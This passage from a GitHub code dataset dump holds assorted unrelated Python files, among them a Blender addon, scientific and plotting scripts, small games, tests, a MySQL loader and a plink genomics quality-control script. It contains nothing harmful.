draw_keymaps(self, context, layout):\n\n wm = bpy.context.window_manager\n box = layout\n\n split = box.split()\n col = split.column()\n col.label(text=\"Vertex Group Utils Hotkey\")\n col.separator()\n\n\n # keymap = context.window_manager.keyconfigs.user.keymaps['3D View']\n # keymap_items = keymap.keymap_items\n # km = keymap.active()\n\n\n\n wm = bpy.context.window_manager\n kc = wm.keyconfigs.user\n\n km = kc.keymaps['3D View']\n kmi = km.keymap_items[\"vgu.call_pie\"]\n\n # kmi = keymap_items[\"vgu.call_pie\"]\n # kmi.show_expanded = False\n # rna_keymap_ui.draw_kmi(kmi, keymap, km, kmi, col, 0)\n # col.separator(factor=0.5)\n\n\n if kmi:\n col.context_pointer_set(\"keymap\", km)\n rna_keymap_ui.draw_kmi([], kc, km, kmi, col, 0)\n else:\n col.operator(Template_Add_Hotkey.bl_idname, text = \"Add hotkey entry\")\n\n\n\n\naddon_keymaps = []\n\n\n\ndef get_addon_preferences():\n ''' quick wrapper for referencing addon preferences '''\n # addon_preferences = bpy.context.user_preferences.addons[__name__].preferences\n addon_preferences = utility_function.get_addon_preferences(bpy.context)\n\n return addon_preferences\n\n\ndef get_hotkey_entry_item(km, kmi_name, kmi_value):\n '''\n returns hotkey of specific type, with specific properties.name (keymap is not a dict, so referencing by keys is not enough\n if there are multiple hotkeys!)\n '''\n for i, km_item in enumerate(km.keymap_items):\n if km.keymap_items.keys()[i] == kmi_name:\n if km.keymap_items[i].properties.name == kmi_value:\n return km_item\n return None\n\n\n\ndef add_hotkey():\n user_preferences = bpy.context.preferences\n\n addon_prefs = utility_function.get_addon_preferences(bpy.context)\n # addon_prefs = user_preferences.addons[\"Vertex Group Utils\"].preferences\n\n wm = bpy.context.window_manager\n kc = wm.keyconfigs.addon\n km = kc.keymaps.new(name=\"3D View\", space_type='VIEW_3D', region_type='WINDOW')\n kmi = km.keymap_items.new(\"vgu.call_pie\", type=\"V\", value=\"PRESS\", shift=True, alt=True)\n # kmi.active = True\n addon_keymaps.append((km, kmi))\n\n\nclass Template_Add_Hotkey(bpy.types.Operator):\n ''' Add hotkey entry '''\n bl_idname = \"template.add_hotkey\"\n bl_label = \"Addon Preferences Example\"\n bl_options = {'REGISTER', 'INTERNAL'}\n\n def execute(self, context):\n add_hotkey()\n # self.report({'INFO'}, \"Hotkey added in User Preferences -> Input -> Screen -> Screen (Global)\")\n return {'FINISHED'}\n\ndef remove_hotkey():\n ''' clears all addon level keymap hotkeys stored in addon_keymaps '''\n wm = bpy.context.window_manager\n kc = wm.keyconfigs.addon\n km = kc.keymaps['3D View']\n\n\n\n for km, kmi in addon_keymaps:\n km.keymap_items.remove(kmi)\n wm.keyconfigs.addon.keymaps.remove(km)\n addon_keymaps.clear()\n\n\n\nclasses = [VGU_user_preferences, Template_Add_Hotkey]\n\ndef register():\n\n add_hotkey()\n\n\n\n for cls in classes:\n bpy.utils.register_class(cls)\n\n\n update_panel(None, bpy.context)\n\n\n # bpy.types.Scene.BoolBasedVisibility = bpy.props.BoolProperty(default=False)\n\n\n\n\n\n\ndef unregister():\n\n remove_hotkey()\n\n update_panel(None, bpy.context)\n\n for cls in classes:\n bpy.utils.unregister_class(cls)\n\n # del bpy.types.Scene.BoolBasedVisibility\n\n\n\nif __name__ == \"__main__\":\n register()\n","repo_name":"BlenderBoi/Vertex_Group_Utils","sub_path":"VGU_Preferences.py","file_name":"VGU_Preferences.py","file_ext":"py","file_size_in_byte":8430,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"84"} +{"seq_id":"35126692015","text":"\r\ncellSize = 0.05\r\nradius = 1.\r\n\r\nfrom fipy import CellVariable, Gmsh2D, TransientTerm, DiffusionTerm, Viewer\r\nfrom fipy.tools import numerix\r\n\r\nmesh = Gmsh2D('''\r\n cellSize = %(cellSize)g;\r\n radius = %(radius)g;\r\n Point(1) = {0, 0, 0, cellSize};\r\n Point(2) = {-radius, 0, 0, cellSize};\r\n Point(3) = {0, radius, 0, cellSize};\r\n Point(4) = {radius, 0, 0, cellSize};\r\n Point(5) = {0, -radius, 0, cellSize};\r\n Circle(6) = {2, 1, 3};\r\n Circle(7) = {3, 1, 4};\r\n Circle(8) = {4, 1, 5};\r\n Circle(9) = {5, 1, 2};\r\n Line Loop(10) = {6, 7, 8, 9};\r\n Plane Surface(11) = {10};\r\n ''' % locals())\r\n\r\nphi = CellVariable(name = \"solution variable\",\r\n mesh = mesh,\r\n value = 0.)\r\n\r\nphi = CellVariable(name = \"solution variable\",\r\n mesh = mesh,\r\n value = 0.)\r\n\r\nviewer = None\r\nfrom fipy import input\r\nif __name__ == '__main__':\r\n try:\r\n viewer = Viewer(vars=phi, datamin=-1, datamax=1.)\r\n viewer.plotMesh()\r\n input(\"Irregular circular mesh. Press to proceed...\")\r\n except:\r\n print(\"Unable to create a viewer for an irregular mesh (try Matplotlib2DViewer or MayaviViewer)\")\r\n\r\nD = 1.\r\neq = TransientTerm() == DiffusionTerm(coeff=D)\r\n\r\nX, Y = mesh.faceCenters\r\nphi.constrain(X, mesh.exteriorFaces)\r\n\r\ntimeStepDuration = 10 * 0.9 * cellSize**2 / (2 * D)\r\nsteps = 10\r\nfrom builtins import range\r\nfor step in range(steps):\r\n eq.solve(var=phi,\r\n dt=timeStepDuration)\r\n if viewer is not None:\r\n viewer.plot()\r\n\r\n\r\n\r\n","repo_name":"Jasmine969/cfd_study","sub_path":"draft2.py","file_name":"draft2.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"12699887718","text":"import queue as q\nclass greedysearch:\n def search(self,d,start,goal):\n que=q.PriorityQueue()\n que.put((start.h,start))\n path=list()\n while(not que.empty()):\n node=que.get()\n node=node[1]\n path.append(node)\n que=q.PriorityQueue()\n if node.name==goal.name:\n return path\n else:\n for child in d[node]:\n if child not in path:\n que.put((child.h,child))\n return [\"error\"]\nclass node:\n def __init__(self,name,h):\n self.name=name\n self.h=h\ns=node('s',7)\na=node('a',6)\nb=node('b',5)\nc=node('c',4)\nd=node('d',2)\ng=node('g',0)\n\nd={s:[a,b],a:[s,g],b:[s,c],c:[b,d],d:[g,c],g:[a,d]}\nobj=greedysearch()\nprint([x.name for x in obj.search(d,s,g)])\n","repo_name":"Momerhussain/Artificial-Intelligence-Practice-Labs","sub_path":"greedy.py","file_name":"greedy.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"72973619795","text":"from flask import Flask, render_template, request, redirect, url_for\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef show_entry_student_scores():\n return render_template(\"entry_student_scores.html\")\n\n@app.route(\"/result\", methods=[\"GET\", \"POST\"])\ndef show_results():\n if request.method == \"POST\":\n res = request.form\n return render_template(\"exam_results.html\", results=res)\n else:\n return redirect(url_for(\"show_entry_student_scores\"))\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n\n","repo_name":"f-fathurrahman/KuliahPython","sub_path":"flask/test_sending_form_data_v1.py","file_name":"test_sending_form_data_v1.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"2425080247","text":"from turtle import Turtle\nimport random\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\n\n\nclass CarManager:\n def __init__(self):\n self.cars = []\n self.car_speed = STARTING_MOVE_DISTANCE\n\n def move(self):\n for car in self.cars:\n new_x = car.xcor() - self.car_speed\n new_y = car.ycor()\n car.goto(new_x, new_y)\n\n def create_car(self):\n create_chance = random.randint(1, 6)\n if create_chance == 1:\n new_car = Turtle(\"square\")\n new_car.penup()\n new_car.shapesize(stretch_wid=1, stretch_len=2)\n new_car.color(random.choice(COLORS))\n new_car.goto(250, random.randrange(-250, 250))\n self.cars.append(new_car)\n\n def movement_continue(self):\n self.car_speed += MOVE_INCREMENT\n","repo_name":"Chuks-Chuks/turtle-crossing-start","sub_path":"car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"23353019401","text":"n=int(input(\"Enter the number of co-ordinates : \"))\r\nli=[]\r\nfor i in range(n):\r\n x,y=map(int,(input(\"Enter the co_ordinates in x,y format: \").split(',')))\r\n li.append((x,y))\r\ncheck_x_negative=sorted(li)\r\ncheck_y_negative=sorted(li, key=lambda x:x[1])\r\nif check_x_negative[0][0]<=0 or check_y_negative[0][1]<=0:\r\n li2 = []\r\n for i in li:\r\n new = []\r\n for j in i:\r\n if j == 0 or j < 0 or j > 0:\r\n j = j + 8\r\n new.append(j)\r\n li2.append(tuple(new))\r\n print(\"The set of positive co_ordinates \")\r\n print(li2)\r\n\r\nelse:\r\n print(\"All Co-ordinates are positive\")\r\n","repo_name":"Shegde495/Assignment-8","sub_path":"Assignment 8.4.py","file_name":"Assignment 8.4.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"22622684243","text":"import numpy as np\nimport matplotlib.pyplot as plt\nr = 5\ncoeff = [1,-4,-12]\nA = np.roots(coeff)\nO = np.array((A[0],0))\nO1 = np.array((A[1],0))\ndef circ_gen(O,r):\n len = 50\n theta = np.linspace(0,2*np.pi,len)\n xc = np.zeros((2,len))\n xc[0,:] = r*np.cos(theta)\n xc[1,:] = r*np.sin(theta)\n xc = (xc.T + O).T\n return xc\nxc = circ_gen(O,5)\nxc1 = circ_gen(O1,5)\nplt.plot(xc[0,:],xc[1,:])\nplt.plot(xc1[0,:],xc1[1,:])\nplt.xlabel('$x$')\nplt.ylabel('$y$')\nplt.grid() # minor\nplt.axis('equal')\nplt.savefig('/sdcard/Download/Matrices/conic/conic.png')\n#plt.show()\n","repo_name":"gadepall/matrix-analysis","sub_path":"bkup/chapters/11/11/1/12/codes/conic.py","file_name":"conic.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"11029354523","text":"import pytest\nfrom helpers import *\nfrom itertools import zip_longest\n\n\nclass TestLogDistribution:\n\n @pytest.mark.parametrize(\"file_name\", [\n \"events_target_1.log\",\n \"events_target_2.log\"\n ])\n def test_verify_file_exist(self, file_name: str):\n \"\"\"\n Test verifies that output event log file exist after input data was split\n :param file_name: string that contains name of the events log file\n \"\"\"\n file_path = f\"{os.getcwd()}/outputs\"\n\n # verify that file exists\n assert os.path.isfile(f\"{file_path}/{file_name}\"), (\n f\"File {file_name} is not found\"\n )\n\n @pytest.mark.parametrize(\"file_names\", [\n {\n \"input\": \"large_1M_events.log\",\n \"target_1\": \"events_target_1.log\",\n \"target_2\": \"events_target_2.log\"\n }\n ])\n def test_verify_output_files_size_match_input_file(self, file_names: dict):\n \"\"\"\n Test verifies that size of two combined events log files matches size of input log file.\n :param file_names: dict with file names\n \"\"\"\n # Get file size in bytes\n main_file = os.stat(f\"{os.getcwd()}/agent/inputs/{file_names.get('input')}\").st_size\n events_one = os.stat(f\"{os.getcwd()}/outputs/{file_names.get('target_1')}\").st_size\n events_two = os.stat(f\"{os.getcwd()}/outputs/{file_names.get('target_2')}\").st_size\n\n # Verify that input log file size matches size of combined output log files\n combined_size = sum([events_one, events_two])\n assert main_file == combined_size, (\n f\"Input file size doesn't match combined output files size\"\n f\"\\nExpected input file size: {main_file} bytes\"\n f\"\\nActual combined file size: {combined_size} bytes\"\n f\"\\nWhere file size in bytes for target_1: {events_one} and target_2: {events_two}\"\n f\"\\nTest input data:\\n{file_names}\"\n )\n\n @pytest.mark.parametrize(\"file_names\", [\n {\n \"input\": \"large_1M_events.log\",\n \"target_1\": \"events_target_1.log\",\n \"target_2\": \"events_target_2.log\"\n }\n ])\n def test_verify_combined_number_lines_match_input(self, file_names: dict):\n \"\"\"\n Test verifies that total combined count of lines in both output event log files matches number\n of lines in the input log file\n :param file_names: dict with file names\n \"\"\"\n # Path to input log file and output events log files\n input_path = f\"{os.getcwd()}/agent/inputs/{file_names.get('input')}\"\n events_one_path = f\"{os.getcwd()}/outputs/{file_names.get('target_1')}\"\n events_two_path = f\"{os.getcwd()}/outputs/{file_names.get('target_2')}\"\n\n # Open log files in 'read' mode (opened files would be automatically closed after the test)\n with open(input_path, \"r\") as input_file, open(events_one_path, \"r\") as events_one, open(events_two_path, \"r\") as events_two:\n input_lines_count, events_one_count, events_two_count = 0, 0, 0\n # Iterate through all files line by line\n for line, line_one, line_two in zip_longest(input_file, events_one, events_two):\n # Increment counts when line from file exist\n if line:\n input_lines_count += 1\n if line_one:\n events_one_count += 1\n if line_two:\n events_two_count += 1\n\n # Verify that number of lines matches\n sum_lines = sum([events_one_count, events_two_count])\n assert input_lines_count == sum_lines, (\n f\"Number of lines in input file doesn't match combined number of lines\"\n f\"\\nExpected number of lines: {input_lines_count}\"\n f\"\\nActual number of lines: {sum_lines}\"\n f\"\\nWhere number of lines for target_1 file: {events_one_count} and target_2 file: {events_two_count}\"\n f\"\\nTest input data: {file_names}\"\n )\n\n @pytest.mark.ddev\n @pytest.mark.parametrize(\"file_names\", [\n {\n \"input\": \"large_1M_events.log\",\n \"target_1\": \"events_target_1.log\",\n \"target_2\": \"events_target_2.log\"\n }\n ])\n def test_verify_file_content_matches(self, file_names: dict):\n # Path to input log file and output events log files\n input_path = f\"{os.getcwd()}/agent/inputs/{file_names.get('input')}\"\n events_one_path = f\"{os.getcwd()}/outputs/{file_names.get('target_1')}\"\n events_two_path = f\"{os.getcwd()}/outputs/{file_names.get('target_2')}\"\n\n # combine two output log filed into one sorted file\n combined_file_path = combine_files(events_one_path, events_two_path)\n # sort_file(combined_file_path)\n\n with open(input_path, 'r') as input_file, open(combined_file_path, 'r') as sorted_results:\n # read data from files\n input_list = input_file.readlines()\n out_list = sorted_results.readlines()\n\n # compare two sets with data from files\n set_difference = set(out_list) - set(input_list)\n corrupted_data = list(set_difference)\n\n # map line of data to a host\n # in case of any data was corrupted after splitter process\n if len(corrupted_data) != 0:\n mapped_to_file = []\n for element in corrupted_data:\n # we need to match line of data with file that it came from\n for file in [events_one_path, events_two_path]:\n # call method that will return True if line matched the file\n file_found = get_file_name_from_string(element, file)\n if file_found:\n # translate file name to host name\n for file_name in file_names.keys():\n if file_name in file:\n host_name = file_name\n mapped_to_file.append((host_name, element))\n # exit loop if file was identified\n break\n\n # verify that data was split without loss\n assert len(corrupted_data) == 0, (\n f\"Total of {len(corrupted_data)} event(s) were corrupter after data went through Splitter\\n\"\n f\"\\nFollowing list of pairs (receiving_host_name, log_line) were corrupted:\\n\"\n f\"{mapped_to_file}\\n\"\n )\n\n","repo_name":"Dkhazhinov/cribl","sub_path":"test/test_events_log_data_distribution.py","file_name":"test_events_log_data_distribution.py","file_ext":"py","file_size_in_byte":6533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"19698987804","text":"import cv2\r\nimport numpy as np\r\nimport serial\r\nimport time\r\n\r\nser = serial.Serial('COM3', baudrate=115200, timeout=1)\r\ntime.sleep(0.5)\r\npanPos = 75\r\ntiltPos = 80\r\nconfThreshold = 0.4\r\ncam = cv2.VideoCapture(1, cv2.CAP_DSHOW)\r\n\r\nclassesFile = 'coco80.names'\r\nclasses = []\r\nwith open(classesFile, 'r') as f:\r\n classes = f.read().splitlines()\r\n\r\nnet = cv2.dnn.readNetFromDarknet('yolov3-320.cfg', 'yolov3-320.weights')\r\nnet.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)\r\nnet.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)\r\n\r\nwhile True:\r\n ret, img = cam.read()\r\n height, width, ch = img.shape\r\n blob = cv2.dnn.blobFromImage(img, 1 / 255, (320, 320), (0, 0, 0), swapRB=True, crop=False)\r\n net.setInput(blob)\r\n\r\n layerNames = net.getLayerNames()\r\n output_layers_names = net.getUnconnectedOutLayersNames()\r\n LayerOutputs = net.forward(output_layers_names)\r\n\r\n bboxes = []\r\n confidences = []\r\n class_ids = []\r\n\r\n for output in LayerOutputs:\r\n for i, detection in enumerate(output):\r\n scores = detection[5:]\r\n class_id = classes.index('cell phone')\r\n confidence = scores[class_id]\r\n if confidence > confThreshold:\r\n center_x = int(detection[0]*width)\r\n center_y = int(detection[1]*height)\r\n w = int(detection[2]*width)\r\n h = int(detection[3]*height)\r\n x = int(center_x - w/2)\r\n y = int(center_y - h/2)\r\n bboxes.append([x, y, w, h])\r\n confidences.append(float(confidence))\r\n class_ids.append(class_id)\r\n\r\n indexes = cv2.dnn.NMSBoxes(bboxes, confidences, confThreshold, 0.4)\r\n\r\n font = cv2.FONT_HERSHEY_PLAIN\r\n colors = np.random.uniform(0, 255, size=(len(bboxes), 3))\r\n\r\n if len(indexes) > 0:\r\n for i, bbox in enumerate(bboxes):\r\n if i in indexes:\r\n x, y, w, h = bbox\r\n label = str(classes[class_ids[i]])\r\n confidence = str(round(confidences[i], 2))\r\n color = colors[i]\r\n cv2.rectangle(img, (x, y), (x+w, y+h), color, 2)\r\n cv2.putText(img, label+\" \"+confidence, (x, y+20), font, 2, (255, 255, 255), 2)\r\n\r\n errorPan = (x + w / 2) - 640 / 2\r\n errorTilt = (y + h / 2) - 480 / 2\r\n print('errorPan', errorPan)\r\n print('errorTilt', errorTilt)\r\n\r\n if abs(errorPan) > 20:\r\n panPos = panPos - errorPan / 30\r\n print('panPos =', panPos)\r\n if abs(errorTilt) > 20:\r\n tiltPos = tiltPos + errorTilt / 30\r\n print('tiltPos =', tiltPos)\r\n\r\n if panPos > 150:\r\n panPos = 150\r\n print(\"panPos Out of range\")\r\n if panPos < 10:\r\n panPos = 10\r\n print(\"panPos out of range\")\r\n if tiltPos > 150:\r\n tiltPos = 150\r\n print(\"tiltPos Out of range\")\r\n if tiltPos < 10:\r\n tiltPos = 10\r\n print(\"tiltPos out of range\")\r\n\r\n panServoPos = str(int(panPos)) + '\\r'\r\n tiltServoPos = str(int(tiltPos)) + '\\r'\r\n ser.write((panServoPos + tiltServoPos).encode('utf-8'))\r\n time.sleep(0.1)\r\n print('panServoPos = ', panServoPos)\r\n print('tiltServoPos = ', tiltServoPos)\r\n\r\n cv2.imshow('MBS3523 Webcam', img)\r\n if cv2.waitKey(1) & 0xff == 27:\r\n break\r\n\r\ncam.release()\r\ncv2.destroyAllWindows()","repo_name":"Bearip/MBS3523-AI-and-Programming","sub_path":"MBS3523-Asn2-Q2.py","file_name":"MBS3523-Asn2-Q2.py","file_ext":"py","file_size_in_byte":3658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"41269801897","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom noiseestimation.sensor import LinearSensor\n\ndt = 0.1\nF = np.array([[1, dt, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, dt],\n [0, 0, 0, 1]])\nH = np.array([[1, 0, 0, 0],\n [0, 0, 1, 0]])\nx0 = np.array([[0],\n [0.5],\n [0],\n [1]])\nsim = LinearSensor(x0, F, H)\n\nmeasurement_vars = np.linspace(0, 1, 500)\nRs = [np.eye(2) * measurement_var for measurement_var in measurement_vars]\nreadings = []\nfor R in Rs:\n sim.step()\n reading = sim.read(R)\n readings.append(reading)\nreadings = np.asarray(readings)\n\nplt.plot(\n readings[:, 0],\n readings[:, 1],\n 'go', label=\"Measurements\")\nplt.show()\n","repo_name":"Kinodim/noiseestimation","sub_path":"evaluation/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"28764998120","text":"from random import *\nimport os\n\nx1 = randint(1, 28)\ncount = 1\nname = str(input(\"Введите ник: \"))\nwar = \"Соперник\"\nsize = 2021\nmassage = [\"Ходи\", \"Давай\"]\nbrat = int(input(\"сколько будешь брать каждый раз: \"))\n\nx = randint(1, 2)\nif x == 1:\n print(f'{name} ПОБЕДИЛ')\nif x == 0:\n print(f'{war} ПОБЕДИЛ')\nprint(f\"Бот брал по {x1}\")","repo_name":"Ruzhikov-Sasha-Maksimovich/HomeWork_06","sub_path":"Second.py","file_name":"Second.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"36917825830","text":"import json\nimport pandas as pd\nimport pymysql\n\nfrom config import FILE_DIR\nfrom utils.database import pymysql_connect\nfrom utils.timer import Timer\n\n\n# 원본 데이터 파일을 원하는 파일형식으로 바꾸는 함수(json or csv)\ndef make_ouput_file(to_type, file):\n file_type = file.split('/')[2].split('.')\n output_file = \"../yelp-dataset/{}.output\".format(file_type)\n data = [json.loads(line) for line in open(file, encoding='utf8')]\n df = pd.DataFrame(data)\n if to_type == 'json':\n df.to_json(output_file, orient='records', indent=False)\n if to_type == 'csv':\n df.to_csv(output_file, mode='w', index=False)\n return output_file\n\n# 바뀐 파일을 입력받아 line by line 처리, chunk_size 만큼 list 에 넣고 pymysql connector 를 사용하여 데이터 적재\n# ex) {\"business_id\":\"--U98MNlDym2cLn36BBPgQ\",\"date\":\"2011-10-05 22:50:41, 2012-04-11 00:06:36, 2012-07-17 23:55:20\"}\n# 'date' 컬럼을 ',' 로 split 하여 row 로 입력(위 데이터 입력시 DB에는 3개의 row 로 적재)\ndef insert_checkin_mysql(json_file, chunk_size):\n with open(json_file, encoding='utf-8') as json_file:\n json_data = json.load(json_file)\n\n checkin_insert_list = []\n\n cnx = pymysql_connect('mysql')\n cur = cnx.cursor(pymysql.cursors.DictCursor)\n for line in json_data:\n for date in line['date'].split(','):\n datetime = date.strip()\n checkin_data_dict = dict(\n business_id=line['business_id'],\n date=datetime\n )\n checkin_insert_list.append(checkin_data_dict)\n\n if len(checkin_insert_list) > chunk_size:\n insert_chekin_sql = \"\"\"INSERT INTO checkin (`business_id`, `date`) VALUES (%(business_id)s, %(date)s)\"\"\"\n time.start('insert {} lines'.format(len(checkin_insert_list)))\n cur.executemany(insert_chekin_sql, checkin_insert_list)\n cnx.commit()\n time.stop()\n checkin_insert_list = []\n\n else:\n pass\n cur.close()\n cnx.close()\n\n\nif __name__ == \"__main__\":\n\n time = Timer()\n json_file = FILE_DIR['checkin']['file_dir']\n output_file = FILE_DIR['checkin']['ouput_file_dir']\n\n print(\"file : \", json_file)\n print(\"output_file : \", output_file)\n\n time.start('make json file')\n make_ouput_file(json_file, output_file)\n time.stop()\n\n chunk_size = 100000\n insert_checkin_mysql(output_file, chunk_size)\n\n","repo_name":"yongdol86/yelp","sub_path":"insert/checkin.py","file_name":"checkin.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"70409849556","text":"#!/usr/bin/env python3\n\n\"\"\"\nMain\nRuns trade agent with passed parameters\n\"\"\"\nfrom dotenv import load_dotenv\n\nfrom tradeagent import TradeAgent\n\nclass textformat:\n PURPLE = '\\033[95m'\n CYAN = '\\033[96m'\n DARKCYAN = '\\033[36m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n END = '\\033[0m'\n\ndef main():\n ta = TradeAgent()\n ta.run()\n\nif __name__ == \"__main__\":\n load_dotenv()\n\n print(\n f\"{textformat.GREEN}%%-------------------------------------------%%{textformat.END}\",\n f\"\\n{textformat.GREEN}%%----------%% TRADER AGENT v0.1 %%----------%%{textformat.END}\",\n f\"\\n{textformat.GREEN}%%-------------------------------------------%%{textformat.END}\",\n )\n\n main()","repo_name":"shamantechnology/tradeagent","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"39632364088","text":"#!/usr/bin/env python3\r\n\r\n## written by Mariam Nawaz\r\n## script to perform quality control on vcf files\r\n## usage: \r\n#1. If using --indep utility\r\n# ./QC_script.py -i [-m] [-maf] [-g] [-hw] [-f] [-s] [-ldp] [-indep_w] [-indep_s] [-indep_v]\r\n\r\n#2 If using --indep-pairwise utility\r\n# ./QC_script.py -i [-m] [-maf] [-g] [-hw] [-f] [-s] [-ldp] [-indep_w] [-indep_s] [-indep_t] \r\n\r\n\r\n# Example1: ./QC_script.py -i GC123.vcf -m 0.05 -maf 0.05 -g 0.1 -hw 0.00000001 -f 0.05 -s 0.1 -ldp i -indep_w 50 -indep_s 5 -indep_v 2\r\n# Example2: ./QC_script.py -i GC123.vcf -m 0.05 -maf 0.05 -g 0.1 -hw 0.00000001 -f 0.05 -s 0.1 -ldp ip -indep_w 50 -indep_s 5 -indep_t 0.5\r\n\r\nimport subprocess\r\nimport argparse\r\nimport os\r\n\r\nparser = argparse.ArgumentParser(description=\"Quality Control of Genomics files\")\r\nparser.add_argument(\"-i\", \"--input\", help=\"Name of the input file\", required=True)\r\nparser.add_argument(\"-m\", \"--m\", help=\"QC: Missing rate per person\") # 0.1\r\nparser.add_argument(\"-maf\", \"--maf\", help=\"QC: Allele frequency\") # 0.05\r\nparser.add_argument(\"-g\", \"--g\", help=\"QC: Missing rate per SNP\") # 0.1\r\nparser.add_argument(\"-hw\", \"--hw\", help=\"QC: Hardy-Weinberg Equilibrium\") # 0.0000001\r\nparser.add_argument(\"-f\", \"--f\", help=\"family wise- QC: Mendel error rate\") # 0.05\r\nparser.add_argument(\"-s\", \"--s\", help=\"SNP wise- QC: Mendel error rate\") # 0.1\r\nparser.add_argument(\"-ldp\", \"--ldprune\", help=\"Choose between indep and indep-pairwise. Type 'i' or 'ip' respectively\") # 50\r\n\r\nparser.add_argument(\"-indep_w\", \"--indep_window\", help=\"window size for indep/indep-pairwise\") # 50\r\nparser.add_argument(\"-indep_s\", \"--indep_snp\", help=\"Number of SNPs to shift the window in indep/indep-pairwise\") # 5\r\nparser.add_argument(\"-indep_v\", \"--indep_vif\", help=\"VIF threshold for indep(only use if selected indep option)\") # 2\r\nparser.add_argument(\"-indep_t\", \"--indep_threshold\", help=\" r^2 threshold for indep-pairwise(only use if selected indep-pairwise option)\") # 0.5\r\n\r\nargs = parser.parse_args()\r\n\r\n# 1. Converting vcf to binary plink files\r\ndef vcf_to_plink(input):\r\n subprocess.call([\"plink\", \"--vcf\", input, \"--make-bed\", \"--out\", input])\r\n\r\n\r\ndef quality_control(**kwargs):\r\n \r\n # 2. Basic Quality controlling\r\n subprocess.call([\"plink\", \"--bfile\", args.input, \"--allow-no-sex\", \"--make-founders\", \"--make-bed\", \"--out\", \"basicQC\"])\r\n\r\n\r\n # 3. QC: Missing rate per person (exclude individuals with too much missing genotype data)\r\n subprocess.call([\"plink\", \"--bfile\", \"basicQC\", \"--mind\", kwargs.get(\"m\"), \"--make-bed\", \"--out\", \"mindQC\"])\r\n\r\n \r\n # 4.QC: Allele frequency (exclude SNPs on the basis of MAF)\r\n subprocess.call([\"plink\", \"--bfile\", \"mindQC\", \"--maf\", kwargs.get(\"maf\"), \"--make-bed\", \"--out\", \"mafQC\"])\r\n\r\n \r\n # 5.QC: Missing rate per SNP (exclude SNPs based on missing genotype rate)\r\n subprocess.call([\"plink\", \"--bfile\", \"mafQC\", \"--geno\", kwargs.get(\"g\"), \"--make-bed\", \"--out\", \"genoQC\"])\r\n\r\n\r\n # 6.QC: Hardy-Weinberg Equilibrium (exclude markers that failure the Hardy-Weinberg test at a specified significance threshold)\r\n subprocess.call([\"plink\", \"--bfile\", \"genoQC\", \"--hwe\", kwargs.get(\"hw\"), \"--make-bed\", \"--out\", \"hweQC\"])\r\n\r\n\r\n # 7.QC: Mendel error rate (For family-based data only, to exclude individuals and/or markers on the basis on Mendel error rate)\r\n subprocess.call([\"plink\", \"--bfile\", \"hweQC\", \"--me\", kwargs.get(\"f\"), kwargs.get(\"s\"), \"--make-bed\", \"--out\", \"mendelQC\"])\r\n\r\n\r\n\r\n# 8.LD pruning of the Quality controlled data\r\ndef LD_pruning_indep(**kwargs):\r\n ## --indep which prunes based on the variance inflation factor (VIF), which recursively removes SNPs within a sliding window\r\n subprocess.call([\"plink\", \"--bfile\", \"mendelQC\", \"--indep\", kwargs.get(\"indep_w\"), kwargs.get(\"indep_snp\"), kwargs.get(\"indep_vif\")])\r\n with open(\"plink.log\",\"r\") as fp:\r\n for line in fp:\r\n if line.startswith(\"Warning: Skipping --indep\"):\r\n # pruning couldn't be done; possible reasons: less than 2 founders\r\n return 0\r\n\r\n # if there is no error, that means pruning has been done\r\n os.system(\"plink --bfile mendelQC --extract plink.prune.in --make-bed --out pruned_data\")\r\n return 1\r\n\r\ndef LD_pruning_indep_pair(**kwargs): \r\n ## --indep-pairwise which is similar, except it is based only on pairwise genotypic correlation.\r\n subprocess.call([\"plink\", \"--bfile\", \"mendelQC\", \"--indep-pairwise\", kwargs.get(\"indep_w\"), kwargs.get(\"indep_snp\"), kwargs.get(\"indep_threshold\")])\r\n with open(\"plink.log\",\"r\") as fp:\r\n for line in fp:\r\n if line.startswith(\"Warning: Skipping --indep-pairwise\"):\r\n # pruning couldn't be done; possible reasons: less than 2 founders\r\n return 0\r\n \r\n os.system(\"plink --bfile mendelQC --extract plink.prune.in --make-bed --out pruned_data\")\r\n return 1\r\n\r\n\r\n\r\n# 9.Converting pruned file back to vcf\r\ndef plink_to_vcf(input, result):\r\n out_file 